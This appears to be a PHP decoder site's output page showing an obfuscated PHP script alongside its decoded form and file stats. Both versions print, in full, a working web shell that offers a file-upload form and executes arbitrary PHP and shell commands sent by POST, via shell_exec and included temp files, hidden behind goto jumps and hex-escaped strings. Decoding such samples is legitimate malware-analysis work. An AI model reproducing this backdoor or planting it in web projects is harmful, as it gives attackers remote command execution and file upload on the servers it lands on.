Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?phpgotobf4d1;d093f:$E72f4="\x3c\77\160\150\x70\40".$Cceb8."\x20\x3f\x3e";gotoa3b63;Bfc2e..
Decoded Output download
<?phpgotobf4d1;d093f:$E72f4="<?php ".$Cceb8." ?>";gotoa3b63;Bfc2e:fwrite($F2926,$E72f4);gotoa56ef;c26d5:$e440b=tempnam(sys_get_temp_dir(),"dynamic");gotoff23f;b9a4e:include$e440b;gotoCdca2;bf4d1:echo"<style>body{background-color:black;color:white;}</style><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader"><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"><br><br><label for="">PHP command </label><input type="text" name="phpcmd" id=""><input name="_upl" type="submit" id="_upl" value="run php command"><br><br><label for="">Shell command </label><input type="text" name="shellcmd" id=""><input name="_upl" type="submit" id="_upl" value="run shell command"></form>";gotof02ff;Ca8f7:$Cceb8=base64_decode($_POST["phpcmd"]);gotod093f;a3b63:fwrite($F2926,$E72f4);gotoFc91d;f02ff:if(!($_POST["_upl"]=="Upload")){gotoA097b;}gotoBa3ef;B02fc:A097b:gotoD4b78;Ba3ef:if(!@copy($_FILES["file"]["tmp_name"],$_FILES["file"]["name"])){gotoed166;}gotoD0ee6;b6c7d:include$e440b;gotof847d;ff23f:$F2926=fopen($e440b,"w");gotoaa32b;D1162:$e440b=tempnam(sys_get_temp_dir(),"dynamic");gotoa06d3;ec8de:echo$b84ef;gotoCb294;Cdca2:$b84ef=ob_get_clean();gotod437e;D0ee6:ed166:gotoB02fc;Fb1de:ob_start();gotob6c7d;f847d:$b84ef=ob_get_clean();gotoBd98e;e5bac:$E72f4="<?php echo(@shell_exec("".$Cceb8.""));?>";gotoBfc2e;E60d1:ob_start();gotob9a4e;Cb294:d3d83:gotoc899a;aa32b:$Cceb8=$_POST["shellcmd"];gotoe5bac;a06d3:$F2926=fopen($e440b,"w");gotoCa8f7;A0250:echo$b84ef;gotoE99d6;c899a:if(!($_POST["_upl"]=="run shell command")){gotoD331d;}gotoc26d5;Bd98e:unlink($e440b);gotoA0250;d437e:unlink($e440b);gotoec8de;D4b78:if(!($_POST["_upl"]=="run php command")){gotod3d83;}gotoD1162;a56ef:fclose($F2926);gotoFb1de;Fc91d:fclose($F2926);gotoE60d1;E99d6:D331d:?>
Did this file decode correctly?
Original Code
<?phpgotobf4d1;d093f:$E72f4="\x3c\77\160\150\x70\40".$Cceb8."\x20\x3f\x3e";gotoa3b63;Bfc2e:fwrite($F2926,$E72f4);gotoa56ef;c26d5:$e440b=tempnam(sys_get_temp_dir(),"\144\x79\156\141\x6d\151\x63");gotoff23f;b9a4e:include$e440b;gotoCdca2;bf4d1:echo"\74\163\164\x79\x6c\x65\76\x62\x6f\x64\171\173\142\x61\143\x6b\x67\162\157\165\x6e\144\55\x63\x6f\154\157\162\72\142\x6c\x61\x63\x6b\x3b\x63\x6f\x6c\157\162\72\167\150\151\x74\x65\x3b\x7d\74\x2f\163\x74\171\154\x65\x3e\x3c\146\157\162\155\x20\x20\x61\x63\x74\x69\x6f\x6e\75\42\x22\40\155\x65\x74\150\157\144\x3d\42\160\157\163\164\42\40\x65\156\x63\164\x79\160\x65\75\42\x6d\165\154\x74\151\160\141\x72\164\57\146\x6f\x72\x6d\x2d\x64\x61\164\x61\42\40\156\x61\155\x65\75\x22\165\x70\x6c\x6f\x61\144\145\x72\42\x20\151\144\x3d\x22\165\160\x6c\157\141\x64\x65\162\42\76\74\151\156\160\x75\x74\40\164\171\x70\x65\75\x22\x66\x69\x6c\x65\x22\x20\x6e\x61\x6d\145\75\42\x66\x69\x6c\x65\x22\40\163\151\x7a\x65\75\42\x35\x30\x22\x3e\74\x69\156\160\x75\164\x20\x6e\x61\155\x65\x3d\42\x5f\165\x70\x6c\42\x20\x74\x79\x70\x65\75\42\163\165\x62\x6d\x69\164\x22\40\x69\x64\x3d\42\x5f\165\160\x6c\x22\x20\166\x61\x6c\165\x65\x3d\42\x55\160\x6c\157\141\x64\42\x3e\74\x62\162\76\x3c\x62\162\x3e\x3c\154\x61\x62\x65\154\40\146\157\x72\75\x22\42\x3e\x50\x48\x50\40\143\157\x6d\155\141\x6e\x64\40\74\57\x6c\x61\x62\145\154\x3e\74\151\x6e\x70\165\164\x20\164\171\160\x65\75\x22\x74\145\170\x74\42\40\x6e\141\155\x65\75\42\x70\150\x70\143\155\x64\42\x20\x69\x64\x3d\x22\x22\x3e\x3c\x69\x6e\x70\x75\x74\x20\156\x61\x6d\145\x3d\x22\x5f\165\x70\154\42\40\164\x79\160\x65\x3d\42\x73\165\x62\155\x69\x74\x22\40\x69\144\75\42\x5f\x75\160\x6c\42\x20\x76\141\x6c\x75\x65\x3d\42\x72\165\156\40\160\x68\x70\x20\x63\x6f\x6d\155\x61\x6e\144\42\76\74\x62\x72\x3e\74\x62\162\76\74\154\x61\x62\145\154\40\146\157\162\75\42\42\x3e\123\150\145\x6c\x6c\x20\143\157\x6d\155\141\156\144\x20\74\57\x6c\x61\x62\145\154\76\x3c\x69\x6e\x70\165\x74\40\x74\171\160\145\75\x22\x74\145\x78\164\42\40\x6e\141\155\x65\75\42\x73\150\145\x6c\x6c\143\155\144\x22\x20\x69\144\x3d\42\x22\76\74\151\x6e\x70\x75\164\40\156\x61\x6d\145\x3d\x22\137\165\160\x6c\42\40\x74\x79\x70\x65\75\x22\x73\165\142\155\x69\x74\42\40\151\144\x3d\x22\137\x75\160\154\x22\x20\x76\141\x6c\165\145\x3d\x22\162\165\156\x20\163\150\x65\x6c\x6c\40\143\157\x6d\155\141\x6e\144\42\x3e\x3c\x2f\x66\x6f\x72\x6d\x3e";gotof02ff;Ca8f7:$Cceb8=base64_decode($_POST["\160\150\x70\x63\155\144"]);gotod093f;a3b63:fwrite($F2926,$E72f4);gotoFc91d;f02ff:if(!($_POST["\137\x75\160\x6c"]=="\125\x70\154\x6f\141\x64")){gotoA097b;}gotoBa3ef;B02fc:A097b:gotoD4b78;Ba3ef:if(!@copy($_FILES["\146\151\x6c\145"]["\164\155\160\x5f\x6e\141\x6d\145"],$_FILES["\146\x69\154\145"]["\156\141\155\145"])){gotoed166;}gotoD0ee6;b6c7d:include$e440b;gotof847d;ff23f:$F2926=fopen($e440b,"\167");gotoaa32b;D1162:$e440b=tempnam(sys_get_temp_dir(),"\x64\171\x6e\x61\155\151\143");gotoa06d3;ec8de:echo$b84ef;gotoCb294;Cdca2:$b84ef=ob_get_clean();gotod437e;D0ee6:ed166:gotoB02fc;Fb1de:ob_start();gotob6c7d;f847d:$b84ef=ob_get_clean();gotoBd98e;e5bac:$E72f4="\x3c\x3f\x70\150\160\x20\145\143\150\157\50\x40\x73\x68\145\x6c\154\x5f\x65\x78\145\x63\x28\42".$Cceb8."\x22\x29\x29\73\77\76";gotoBfc2e;E60d1:ob_start();gotob9a4e;Cb294:d3d83:gotoc899a;aa32b:$Cceb8=$_POST["\163\x68\145\154\154\x63\155\144"];gotoe5bac;a06d3:$F2926=fopen($e440b,"\167");gotoCa8f7;A0250:echo$b84ef;gotoE99d6;c899a:if(!($_POST["\137\x75\x70\154"]=="\162\165\x6e\x20\163\x68\x65\154\x6c\40\143\157\x6d\155\x61\x6e\x64")){gotoD331d;}gotoc26d5;Bd98e:unlink($e440b);gotoA0250;d437e:unlink($e440b);gotoec8de;D4b78:if(!($_POST["\x5f\x75\x70\154"]=="\x72\x75\x6e\x20\x70\x68\160\40\x63\x6f\155\x6d\141\156\x64")){gotod3d83;}gotoD1162;a56ef:fclose($F2926);gotoFb1de;Fc91d:fclose($F2926);gotoE60d1;E99d6:D331d:?>
Function Calls
None |
Stats
MD5 | 6e266806b0b3f6b1271e4f9aabd0d1a8 |
Eval Count | 0 |
Decode Time | 34 ms |